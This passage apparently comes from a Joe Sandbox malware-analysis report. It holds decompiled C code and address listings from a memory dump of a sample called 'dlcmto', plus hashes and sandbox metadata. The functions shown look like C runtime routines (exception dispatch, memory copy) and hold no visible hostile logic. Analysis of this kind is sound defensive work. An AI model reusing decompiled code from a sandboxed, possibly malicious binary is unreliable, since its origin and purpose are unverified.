												E011963FE(_t88);
												_t61 = _v20;
												_t125 = _t125 + 0x10;
												__eflags = _t61;
												if(_t61 != 0) {
													L30:
													 *0x11a9190 = _t61;
												}
											}
											__eflags = _a4 - _t88;
											if(_a4 == _t88) {
												goto L41;
											} else {
												_t40 = _t115 + 1; // 0x1
												_t98 = _t40;
												do {
													_t62 =  *_t115;
													_t115 = _t115 + 1;
													__eflags = _t62;
												} while (_t62 != 0);
												_t41 = _t115 - _t98 + 2; // 0x3
												_v20 = _t41;
												_t118 = E011971A3(_t41, 1);
												_pop(_t100);
												__eflags = _t118;
												if(_t118 == 0) {
													L38:
													E011963FE(_t118);
													goto L41;
												} else {
													__eflags = E01194B71(_t118, _v20, _v0);
													if(__eflags != 0) {
														_push(_t88);
														_push(_t88);
														_push(_t88);
														_push(_t88);
														_push(_t88);
														E011964E1();
														asm("int3");
														_t68 =  *0x11a9190; // 0xf21a38
														__eflags = _t68 -  *0x11a919c; // 0xf21a38
														if(__eflags == 0) {
															_push(_t68);
															_t69 = E01198AD8(_t88, _t100, _t112, _t118);
															 *0x11a9190 = _t69;
															return _t69;
														}
														return _t68;
													} else {
														asm("sbb eax, eax");
														 *(_v24 + 1 + _t118 - _v0 - 1) = _t88;
														__eflags = E0119C04C(_v24 + 1 + _t118 - _v0, _t110, __eflags, _t118,  ~_v9 & _v24 + 0x00000001 + _t118 - _v0);
														if(__eflags == 0) {
															_t76 = E01196E3F(__eflags);
															_t89 = _t88 | 0xffffffff;
															__eflags = _t89;
															 *_t76 = 0x2a;
														}
														goto L38;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a4;
								if(_a4 == 0) {
									L10:
									__eflags = _v9 - _t88;
									if(_v9 != _t88) {
										 *0x11a9190 = E011971A3(1, 4);
										E011963FE(_t88);
										_t125 = _t125 + 0xc;
										__eflags =  *0x11a9190 - _t88; // 0xf21a38
										if(__eflags == 0) {
											L40:
											_t89 = _t88 | 0xffffffff;
											__eflags = _t89;
											goto L41;
										} else {
											__eflags =  *0x11a9194 - _t88; // 0x0
											if(__eflags != 0) {
												goto L15;
											} else {
												 *0x11a9194 = E011971A3(1, 4);
												E011963FE(_t88);
												_t125 = _t125 + 0xc;
												__eflags =  *0x11a9194 - _t88; // 0x0
												if(__eflags == 0) {
													goto L40;
												} else {
													goto L15;
												}
											}
										}
									} else {
										_t89 = 0;
										L41:
										E011963FE(_t112);
										_t52 = _t89;
										goto L42;
									}
								} else {
									__eflags =  *0x11a9194 - _t88; // 0x0
									if(__eflags == 0) {
										goto L10;
									} else {
										__eflags = E0119370F();
										if(__eflags == 0) {
											goto L39;
										} else {
											L44();
											goto L15;
										}
									}
								}
							}
						}
					}
				} else {
					_t87 = E01196E3F(_t128);
					 *_t87 = 0x16;
					_t52 = _t87 | 0xffffffff;
					L42:
					return _t52;
				}
			}


































                                          0x01198820
                                          0x01198825
                                          0x0119882d
                                          0x01198830
                                          0x01198833
                                          0x01198834
                                          0x01198837
                                          0x01198839
                                          0x0119884e
                                          0x0119884f
                                          0x01198853
                                          0x01198855
                                          0x0119885a
                                          0x0119885f
                                          0x01198861
                                          0x01198a42
                                          0x01198a47
                                          0x00000000
                                          0x01198867
                                          0x01198867
                                          0x01198869
                                          0x00000000
                                          0x0119886f
                                          0x01198872
                                          0x01198875
                                          0x0119887a
                                          0x0119887c
                                          0x01198882
                                          0x011988ff
                                          0x011988ff
                                          0x01198904
                                          0x01198907
                                          0x01198909
                                          0x00000000
                                          0x0119890f
                                          0x01198916
                                          0x0119891b
                                          0x01198920
                                          0x01198923
                                          0x01198925
                                          0x01198976
                                          0x01198976
                                          0x01198979
                                          0x00000000
                                          0x0119897f
                                          0x0119897f
                                          0x01198981
                                          0x01198984
                                          0x01198984
                                          0x01198987
                                          0x01198989
                                          0x00000000
                                          0x0119898f
                                          0x0119898f
                                          0x01198995
                                          0x00000000
                                          0x0119899b
                                          0x011989a5
                                          0x011989a8
                                          0x011989ad
                                          0x011989b0
                                          0x011989b3
                                          0x011989b5
                                          0x00000000
                                          0x011989bb
                                          0x011989bb
                                          0x011989be
                                          0x011989c0
                                          0x011989c3
                                          0x00000000
                                          0x011989c3
                                          0x011989b5
                                          0x01198995
                                          0x01198989
                                          0x01198927
                                          0x01198927
                                          0x01198929
                                          0x00000000
                                          0x0119892b
                                          0x0119892e
                                          0x01198934
                                          0x01198937
                                          0x0119893a
                                          0x0119896f
                                          0x01198971
                                          0x0119893c
                                          0x0119893c
                                          0x01198949
                                          0x01198949
                                          0x0119894c
                                          0x00000000
                                          0x00000000
                                          0x01198945
                                          0x01198948
                                          0x01198948
                                          0x01198948
                                          0x01198958
                                          0x0119895b
                                          0x01198960
                                          0x01198963
                                          0x01198966
                                          0x01198968
                                          0x011989c7
                                          0x011989c7
                                          0x011989c7
                                          0x01198968
                                          0x011989cc
                                          0x011989cf
                                          0x00000000
                                          0x011989d1
                                          0x011989d1
                                          0x011989d1
                                          0x011989d4
                                          0x011989d4
                                          0x011989d6
                                          0x011989d7
                                          0x011989d7
                                          0x011989df
                                          0x011989e3
                                          0x011989eb
                                          0x011989ee
                                          0x011989ef
                                          0x011989f1
                                          0x01198a39
                                          0x01198a3a
                                          0x00000000
                                          0x011989f3
                                          0x01198a02
                                          0x01198a04
                                          0x01198a5e
                                          0x01198a5f
                                          0x01198a60
                                          0x01198a61
                                          0x01198a62
                                          0x01198a63
                                          0x01198a68
                                          0x01198a69
                                          0x01198a6e
                                          0x01198a74
                                          0x01198a76
                                          0x01198a77
                                          0x01198a7d
                                          0x00000000
                                          0x01198a7d
                                          0x01198a82
                                          0x01198a06
                                          0x01198a17
                                          0x01198a1b
                                          0x01198a27
                                          0x01198a29
                                          0x01198a2b
                                          0x01198a30
                                          0x01198a30
                                          0x01198a33
                                          0x01198a33
                                          0x00000000
                                          0x01198a29
                                          0x01198a04
                                          0x011989f1
                                          0x011989cf
                                          0x01198929
                                          0x01198925
                                          0x01198884
                                          0x01198884
                                          0x01198887
                                          0x011988a5
                                          0x011988a5
                                          0x011988a8
                                          0x011988bb
                                          0x011988c0
                                          0x011988c5
                                          0x011988c8
                                          0x011988ce
                                          0x01198a4d
                                          0x01198a4d
                                          0x01198a4d
                                          0x00000000
                                          0x011988d4
                                          0x011988d4
                                          0x011988da
                                          0x00000000
                                          0x011988dc
                                          0x011988e6
                                          0x011988eb
                                          0x011988f0
                                          0x011988f3
                                          0x011988f9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011988f9
                                          0x011988da
                                          0x011988aa
                                          0x011988aa
                                          0x01198a50
                                          0x01198a51
                                          0x01198a58
                                          0x00000000
                                          0x01198a5a
                                          0x01198889
                                          0x01198889
                                          0x0119888f
                                          0x00000000
                                          0x01198891
                                          0x01198896
                                          0x01198898
                                          0x00000000
                                          0x0119889e
                                          0x0119889e
                                          0x00000000
                                          0x0119889e
                                          0x01198898
                                          0x0119888f
                                          0x01198887
                                          0x01198882
                                          0x01198869
                                          0x0119883b
                                          0x0119883b
                                          0x01198840
                                          0x01198846
                                          0x01198a5b
                                          0x01198a5d
                                          0x01198a5d

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 3409252457-0
                                          • Opcode ID: d8c3faf08b59d36ecc0c932d81c2680f79430c991066208226064ee79ab3ebbf
                                          • Instruction ID: 97408e6bf60b2df1b59b7171f317fe539476c4c3bc179ea01d89af4c212d9fc8
                                          • Opcode Fuzzy Hash: d8c3faf08b59d36ecc0c932d81c2680f79430c991066208226064ee79ab3ebbf
                                          • Instruction Fuzzy Hash: 6161E47190420AAFEF2DAFBCD840A6D7FA4AF03728F04416ED6349B181EB359540CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011921F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 45%
                                          			E011921F0(void* __ebx, void* __ecx, intOrPtr __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				void* _v36;
				void* _v40;
				char* __edi;
				intOrPtr* __esi;
				int _t150;
				signed int _t157;
				intOrPtr _t158;
				void* _t159;
				intOrPtr* _t160;
				intOrPtr _t162;
				void* _t165;
				signed int _t167;
				void _t175;
				void _t176;
				int _t178;
				unsigned int _t179;
				int _t180;
				int _t191;
				intOrPtr* _t195;
				intOrPtr _t196;
				signed int _t200;
				char _t202;
				int _t206;
				unsigned int _t207;
				int _t208;
				int _t210;
				int _t215;
				signed int _t226;
				unsigned int _t230;
				int _t231;
				int _t233;
				signed int _t239;
				void* _t240;
				intOrPtr _t241;
				void* _t243;
				signed int _t251;
				intOrPtr _t258;
				void* _t260;
				void* _t263;
				void* _t264;
				void* _t265;
				intOrPtr* _t267;
				int _t271;
				void* _t275;
				void* _t277;
				void* _t287;

				_t221 = __edx;
				_t195 = _a4;
				_push(_t240);
				_v5 = 0;
				_v16 = 1;
				 *_t195 = E0119F2C3(__ecx,  *_t195);
				_t196 = _a8;
				_t6 = _t196 + 0x10; // 0x11
				_t258 = _t6;
				_push(_t258);
				_v20 = _t258;
				_v12 =  *(_t196 + 8) ^  *0x11a7210;
				E011921B0(_t196, __edx, _t240, _t258,  *(_t196 + 8) ^  *0x11a7210);
				E01194EF7(_a12);
				_t150 = _a4;
				_t277 = _t275 - 0x1c + 0x10;
				_t241 =  *((intOrPtr*)(_t196 + 0xc));
				if(( *(_t150 + 4) & 0x00000066) != 0) {
					__eflags = _t241 - 0xfffffffe;
					if(_t241 != 0xfffffffe) {
						_t221 = 0xfffffffe;
						E01194EE0(_t196, 0xfffffffe, _t258, 0x11a7210);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t150;
					_v28 = _a12;
					 *((intOrPtr*)(_t196 - 4)) =  &_v32;
					if(_t241 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t200 = _v12;
							_t157 = _t241 + (_t241 + 2) * 2;
							_t196 =  *((intOrPtr*)(_t200 + _t157 * 4));
							_t158 = _t200 + _t157 * 4;
							_t201 =  *((intOrPtr*)(_t158 + 4));
							_v24 = _t158;
							if( *((intOrPtr*)(_t158 + 4)) == 0) {
								_t202 = _v5;
								goto L7;
							} else {
								_t221 = _t258;
								_t159 = E01194E80(_t201, _t258);
								_t202 = 1;
								_v5 = 1;
								_t287 = _t159;
								if(_t287 < 0) {
									_v16 = 0;
									L13:
									_push(_t258);
									E011921B0(_t196, _t221, _t241, _t258, _v12);
									goto L14;
								} else {
									if(_t287 > 0) {
										_t160 = _a4;
										__eflags =  *_t160 - 0xe06d7363;
										if( *_t160 == 0xe06d7363) {
											__eflags =  *0x11a01f8;
											if(__eflags != 0) {
												_t191 = E01194CD0(__eflags, 0x11a01f8);
												_t277 = _t277 + 4;
												__eflags = _t191;
												if(_t191 != 0) {
													_t271 =  *0x11a01f8; // 0x1192055
													 *0x11aa000(_a4, 1);
													 *_t271();
													_t258 = _v20;
													_t277 = _t277 + 8;
												}
												_t160 = _a4;
											}
										}
										_t222 = _t160;
										E01194EC0(_t160, _a8, _t160);
										_t162 = _a8;
										__eflags =  *((intOrPtr*)(_t162 + 0xc)) - _t241;
										if( *((intOrPtr*)(_t162 + 0xc)) != _t241) {
											_t222 = _t241;
											E01194EE0(_t162, _t241, _t258, 0x11a7210);
											_t162 = _a8;
										}
										_push(_t258);
										 *((intOrPtr*)(_t162 + 0xc)) = _t196;
										E011921B0(_t196, _t222, _t241, _t258, _v12);
										E01194EA0();
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t241);
										_push(_t258);
										_t260 = _v36;
										_t206 = _v32;
										_t243 = _v40;
										_t165 = _t260 + _t206;
										__eflags = _t243 - _t260;
										if(_t243 <= _t260) {
											L25:
											__eflags = _t206 - 0x20;
											if(_t206 < 0x20) {
												L96:
												_t207 = _t206 & 0x0000001f;
												__eflags = _t207;
												if(_t207 != 0) {
													_t167 = _t207;
													_t208 = _t207 >> 2;
													__eflags = _t208;
													while(_t208 != 0) {
														 *_t243 =  *_t260;
														_t243 = _t243 + 4;
														_t260 = _t260 + 4;
														_t208 = _t208 - 1;
														__eflags = _t208;
													}
													_t210 = _t167 & 0x00000003;
													__eflags = _t210;
													while(_t210 != 0) {
														 *_t243 =  *_t260;
														_t260 = _t260 + 1;
														_t243 = _t243 + 1;
														_t210 = _t210 - 1;
														__eflags = _t210;
													}
												}
												goto L102;
											} else {
												__eflags = _t206 - 0x80;
												if(__eflags >= 0) {
													asm("bt dword [0x11a8d0c], 0x1");
													if(__eflags >= 0) {
														__eflags = (_t243 ^ _t260) & 0x0000000f;
														if(__eflags != 0) {
															L33:
															asm("bt dword [0x11a8d0c], 0x0");
															if(__eflags >= 0) {
																goto L58;
															} else {
																__eflags = _t243 & 0x00000003;
																if((_t243 & 0x00000003) != 0) {
																	goto L58;
																} else {
																	__eflags = _t260 & 0x00000003;
																	if(__eflags == 0) {
																		asm("bt edi, 0x2");
																		if(__eflags < 0) {
																			_t176 =  *_t260;
																			_t206 = _t206 - 4;
																			__eflags = _t206;
																			_t260 = _t260 + 4;
																			 *_t243 = _t176;
																			_t58 = _t243 + 4; // 0xc033a47d
																			_t243 = _t58;
																		}
																		asm("bt edi, 0x3");
																		if(__eflags < 0) {
																			asm("movq xmm1, [esi]");
																			_t206 = _t206 - 8;
																			__eflags = _t206;
																			_t260 = _t260 + 8;
																			asm("movq [edi], xmm1");
																			_t60 = _t243 + 8; // 0x8498bab
																			_t243 = _t60;
																		}
																		__eflags = _t260 & 0x00000007;
																		if(__eflags == 0) {
																			asm("movdqa xmm1, [esi-0x8]");
																			_t263 = _t260 - 8;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t263 = _t263 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0x8");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0x8");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0x8");
																				asm("movdqa [edi+0x20], xmm5");
																				_t69 = _t243 + 0x30; // 0x1
																				_t243 = _t69;
																			} while (_t206 >= 0x30);
																			_t260 = _t263 + 8;
																		} else {
																			asm("bt esi, 0x3");
																			if(__eflags >= 0) {
																				asm("movdqa xmm1, [esi-0x4]");
																				_t264 = _t260 - 4;
																				do {
																					asm("movdqa xmm3, [esi+0x10]");
																					_t206 = _t206 - 0x30;
																					asm("movdqa xmm0, [esi+0x20]");
																					asm("movdqa xmm5, [esi+0x30]");
																					_t264 = _t264 + 0x30;
																					__eflags = _t206 - 0x30;
																					asm("movdqa xmm2, xmm3");
																					asm("palignr xmm3, xmm1, 0x4");
																					asm("movdqa [edi], xmm3");
																					asm("movdqa xmm4, xmm0");
																					asm("palignr xmm0, xmm2, 0x4");
																					asm("movdqa [edi+0x10], xmm0");
																					asm("movdqa xmm1, xmm5");
																					asm("palignr xmm5, xmm4, 0x4");
																					asm("movdqa [edi+0x20], xmm5");
																					_t73 = _t243 + 0x30; // 0x1
																					_t243 = _t73;
																				} while (_t206 >= 0x30);
																				_t260 = _t264 + 4;
																				while(1) {
																					L51:
																					__eflags = _t206 - 0x10;
																					if(__eflags < 0) {
																						break;
																					}
																					asm("movdqu xmm1, [esi]");
																					_t206 = _t206 - 0x10;
																					_t260 = _t260 + 0x10;
																					asm("movdqa [edi], xmm1");
																					_t243 = _t243 + 0x10;
																				}
																				asm("bt ecx, 0x2");
																				if(__eflags < 0) {
																					_t175 =  *_t260;
																					_t206 = _t206 - 4;
																					__eflags = _t206;
																					_t260 = _t260 + 4;
																					 *_t243 = _t175;
																					_t243 = _t243 + 4;
																				}
																				asm("bt ecx, 0x3");
																				if(__eflags < 0) {
																					asm("movq xmm1, [esi]");
																					__eflags = _t206;
																					_t260 = _t260 + 8;
																					asm("movq [edi], xmm1");
																					_t243 = _t243 + 8;
																				}
																				goto __eax;
																			}
																			asm("movdqa xmm1, [esi-0xc]");
																			_t265 = _t260 - 0xc;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t265 = _t265 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0xc");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0xc");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0xc");
																				asm("movdqa [edi+0x20], xmm5");
																				_t65 = _t243 + 0x30; // 0x1
																				_t243 = _t65;
																			} while (_t206 >= 0x30);
																			_t66 = _t265 + 0xc; // 0x86ac3c9
																			_t260 = _t66;
																		}
																		goto L51;
																	}
																}
															}
															goto L60;
														} else {
															asm("bt dword [0x11a7218], 0x1");
															if(__eflags < 0) {
																_t178 = _t260 & 0x0000000f;
																__eflags = _t178;
																if(_t178 != 0) {
																	_push(_t206 - 0x10);
																	_t179 = 0x10 - _t178;
																	_t215 = _t179 & 0x00000003;
																	__eflags = _t215;
																	while(_t215 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 1;
																		_t243 = _t243 + 1;
																		_t215 = _t215 - 1;
																		__eflags = _t215;
																	}
																	_t180 = _t179 >> 2;
																	__eflags = _t180;
																	while(_t180 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 4;
																		_t144 = _t243 + 4; // 0xabc033a4
																		_t243 = _t144;
																		_t180 = _t180 - 1;
																		__eflags = _t180;
																	}
																	_pop(_t206);
																}
																_t230 = _t206;
																_t206 = _t206 & 0x0000007f;
																_t231 = _t230 >> 7;
																__eflags = _t231;
																while(_t231 != 0) {
																	asm("movdqa xmm0, [esi]");
																	asm("movdqa xmm1, [esi+0x10]");
																	asm("movdqa xmm2, [esi+0x20]");
																	asm("movdqa xmm3, [esi+0x30]");
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm1");
																	asm("movdqa [edi+0x20], xmm2");
																	asm("movdqa [edi+0x30], xmm3");
																	asm("movdqa xmm4, [esi+0x40]");
																	asm("movdqa xmm5, [esi+0x50]");
																	asm("movdqa xmm6, [esi+0x60]");
																	asm("movdqa xmm7, [esi+0x70]");
																	asm("movdqa [edi+0x40], xmm4");
																	asm("movdqa [edi+0x50], xmm5");
																	asm("movdqa [edi+0x60], xmm6");
																	asm("movdqa [edi+0x70], xmm7");
																	_t260 = _t260 + 0x80;
																	_t139 = _t243 + 0x80; // 0x11a7968
																	_t243 = _t139;
																	_t231 = _t231 - 1;
																	__eflags = _t231;
																}
																goto L92;
															} else {
																goto L33;
															}
														}
													} else {
														memcpy(_t243, _t260, _t206);
														return _v40;
													}
												} else {
													asm("bt dword [0x11a7218], 0x1");
													if(__eflags < 0) {
														L92:
														__eflags = _t206;
														if(_t206 != 0) {
															_t233 = _t206 >> 5;
															__eflags = _t233;
															if(_t233 != 0) {
																do {
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t260 = _t260 + 0x20;
																	_t141 = _t243 + 0x20; // 0x0
																	_t243 = _t141;
																	_t233 = _t233 - 1;
																	__eflags = _t233;
																} while (_t233 != 0);
															}
															goto L96;
														}
														L102:
														return _v40;
													} else {
														L58:
														__eflags = _t243 & 0x00000003;
														while((_t243 & 0x00000003) != 0) {
															 *_t243 =  *_t260;
															_t206 = _t206 - 1;
															_t260 = _t260 + 1;
															_t243 = _t243 + 1;
															__eflags = _t243 & 0x00000003;
														}
														L60:
														_t226 = _t206;
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L96;
														} else {
															memcpy(_t243, _t260, _t206 >> 2 << 2);
															switch( *((intOrPtr*)((_t226 & 0x00000003) * 4 +  &M011925B4))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *__edi =  *__esi;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	 *__edi =  *__esi;
																	_t92 = __esi + 1; // 0xc0330cc4
																	 *((char*)(__edi + 1)) =  *_t92;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *__edi =  *__esi;
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											}
										} else {
											__eflags = _t243 - _t165;
											if(_t243 < _t165) {
												_t267 = _t260 + _t206;
												_t251 = _t243 + _t206;
												__eflags = _t206 - 0x20;
												if(__eflags < 0) {
													L83:
													__eflags = _t206 & 0xfffffffc;
													while((_t206 & 0xfffffffc) != 0) {
														_t251 = _t251 - 4;
														_t267 = _t267 - 4;
														 *_t251 =  *_t267;
														_t206 = _t206 - 4;
														__eflags = _t206 & 0xfffffffc;
													}
													__eflags = _t206;
													if(_t206 != 0) {
														do {
															_t251 = _t251 - 1;
															_t267 = _t267 - 1;
															 *_t251 =  *_t267;
															_t206 = _t206 - 1;
															__eflags = _t206;
														} while (_t206 != 0);
													}
													return _v40;
												} else {
													asm("bt dword [0x11a7218], 0x1");
													if(__eflags < 0) {
														__eflags = _t251 & 0x0000000f;
														if((_t251 & 0x0000000f) != 0) {
															do {
																_t206 = _t206 - 1;
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																 *_t251 =  *_t267;
																__eflags = _t251 & 0x0000000f;
															} while ((_t251 & 0x0000000f) != 0);
															while(1) {
																L79:
																__eflags = _t206 - 0x80;
																if(_t206 < 0x80) {
																	break;
																}
																_t267 = _t267 - 0x80;
																_t251 = _t251 - 0x80;
																asm("movdqu xmm0, [esi]");
																asm("movdqu xmm1, [esi+0x10]");
																asm("movdqu xmm2, [esi+0x20]");
																asm("movdqu xmm3, [esi+0x30]");
																asm("movdqu xmm4, [esi+0x40]");
																asm("movdqu xmm5, [esi+0x50]");
																asm("movdqu xmm6, [esi+0x60]");
																asm("movdqu xmm7, [esi+0x70]");
																asm("movdqu [edi], xmm0");
																asm("movdqu [edi+0x10], xmm1");
																asm("movdqu [edi+0x20], xmm2");
																asm("movdqu [edi+0x30], xmm3");
																asm("movdqu [edi+0x40], xmm4");
																asm("movdqu [edi+0x50], xmm5");
																asm("movdqu [edi+0x60], xmm6");
																asm("movdqu [edi+0x70], xmm7");
																_t206 = _t206 - 0x80;
																__eflags = _t206 & 0xffffff80;
																if((_t206 & 0xffffff80) != 0) {
																	continue;
																}
																break;
															}
															__eflags = _t206 - 0x20;
															if(_t206 >= 0x20) {
																do {
																	_t267 = _t267 - 0x20;
																	_t251 = _t251 - 0x20;
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t206 = _t206 - 0x20;
																	__eflags = _t206 & 0xffffffe0;
																} while ((_t206 & 0xffffffe0) != 0);
															}
															goto L83;
														}
														goto L79;
													} else {
														__eflags = _t251 & 0x00000003;
														if((_t251 & 0x00000003) != 0) {
															_t239 = _t251 & 0x00000003;
															_t206 = _t206 - _t239;
															__eflags = _t206;
															do {
																 *(_t251 - 1) =  *((intOrPtr*)(_t267 - 1));
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																_t239 = _t239 - 1;
																__eflags = _t239;
															} while (_t239 != 0);
														}
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L83;
														} else {
															asm("std");
															memcpy(_t251 - 4, _t267 - 4, _t206 >> 2 << 2);
															asm("cld");
															switch( *((intOrPtr*)((_t206 & 0x00000003) * 4 +  &M01192660))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	_t113 = __esi + 3; // 0x36ebc033
																	 *((char*)(__edi + 3)) =  *_t113;
																	_t115 = __esi + 2; // 0xebc0330c
																	 *((char*)(__edi + 2)) =  *_t115;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											} else {
												goto L25;
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L108;
							L7:
							_t241 = _t196;
						} while (_t196 != 0xfffffffe);
						if(_t202 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L108:
			}
























































                                          0x011921f0
                                          0x011921f7
                                          0x011921fb
                                          0x011921fc
                                          0x01192202
                                          0x0119220e
                                          0x01192210
                                          0x01192216
                                          0x01192216
                                          0x0119221f
                                          0x01192221
                                          0x01192224
                                          0x01192227
                                          0x0119222f
                                          0x01192234
                                          0x01192237
                                          0x0119223a
                                          0x01192241
                                          0x0119229d
                                          0x011922a0
                                          0x011922a8
                                          0x011922af
                                          0x00000000
                                          0x011922af
                                          0x00000000
                                          0x01192243
                                          0x01192243
                                          0x01192249
                                          0x0119224f
                                          0x01192255
                                          0x011922c0
                                          0x011922c9
                                          0x01192257
                                          0x01192257
                                          0x01192257
                                          0x0119225d
                                          0x01192260
                                          0x01192263
                                          0x01192266
                                          0x01192269
                                          0x0119226e
                                          0x01192284
                                          0x00000000
                                          0x01192270
                                          0x01192270
                                          0x01192272
                                          0x01192277
                                          0x01192279
                                          0x0119227c
                                          0x0119227e
                                          0x01192294
                                          0x011922b4
                                          0x011922b4
                                          0x011922b8
                                          0x00000000
                                          0x01192280
                                          0x01192280
                                          0x011922ca
                                          0x011922cd
                                          0x011922d3
                                          0x011922d5
                                          0x011922dc
                                          0x011922e3
                                          0x011922e8
                                          0x011922eb
                                          0x011922ed
                                          0x011922ef
                                          0x011922fc
                                          0x01192302
                                          0x01192304
                                          0x01192307
                                          0x01192307
                                          0x0119230a
                                          0x0119230a
                                          0x011922dc
                                          0x01192310
                                          0x01192312
                                          0x01192317
                                          0x0119231a
                                          0x0119231d
                                          0x01192325
                                          0x01192329
                                          0x0119232e
                                          0x0119232e
                                          0x01192331
                                          0x01192335
                                          0x01192338
                                          0x01192348
                                          0x0119234d
                                          0x0119234e
                                          0x0119234f
                                          0x01192350
                                          0x01192351
                                          0x01192352
                                          0x01192356
                                          0x0119235a
                                          0x01192362
                                          0x01192364
                                          0x01192366
                                          0x01192370
                                          0x01192370
                                          0x01192373
                                          0x0119284b
                                          0x0119284b
                                          0x0119284b
                                          0x0119284e
                                          0x01192850
                                          0x01192852
                                          0x01192852
                                          0x01192855
                                          0x01192859
                                          0x0119285b
                                          0x0119285e
                                          0x01192861
                                          0x01192861
                                          0x01192861
                                          0x01192868
                                          0x01192868
                                          0x0119286b
                                          0x0119286f
                                          0x01192871
                                          0x01192872
                                          0x01192873
                                          0x01192873
                                          0x01192873
                                          0x0119286b
                                          0x00000000
                                          0x01192379
                                          0x01192379
                                          0x0119237f
                                          0x01192394
                                          0x0119239c
                                          0x011923ab
                                          0x011923b0
                                          0x011923c0
                                          0x011923c0
                                          0x011923c8
                                          0x00000000
                                          0x011923ce
                                          0x011923ce
                                          0x011923d4
                                          0x00000000
                                          0x011923da
                                          0x011923da
                                          0x011923e0
                                          0x011923e6
                                          0x011923ea
                                          0x011923ec
                                          0x011923ee
                                          0x011923ee
                                          0x011923f1
                                          0x011923f4
                                          0x011923f6
                                          0x011923f6
                                          0x011923f6
                                          0x011923f9
                                          0x011923fd
                                          0x011923ff
                                          0x01192403
                                          0x01192403
                                          0x01192406
                                          0x01192409
                                          0x0119240d
                                          0x0119240d
                                          0x0119240d
                                          0x01192410
                                          0x01192416
                                          0x0119247d
                                          0x01192482
                                          0x01192488
                                          0x01192488
                                          0x0119248d
                                          0x01192490
                                          0x01192495
                                          0x0119249a
                                          0x0119249d
                                          0x011924a0
                                          0x011924a4
                                          0x011924aa
                                          0x011924ae
                                          0x011924b2
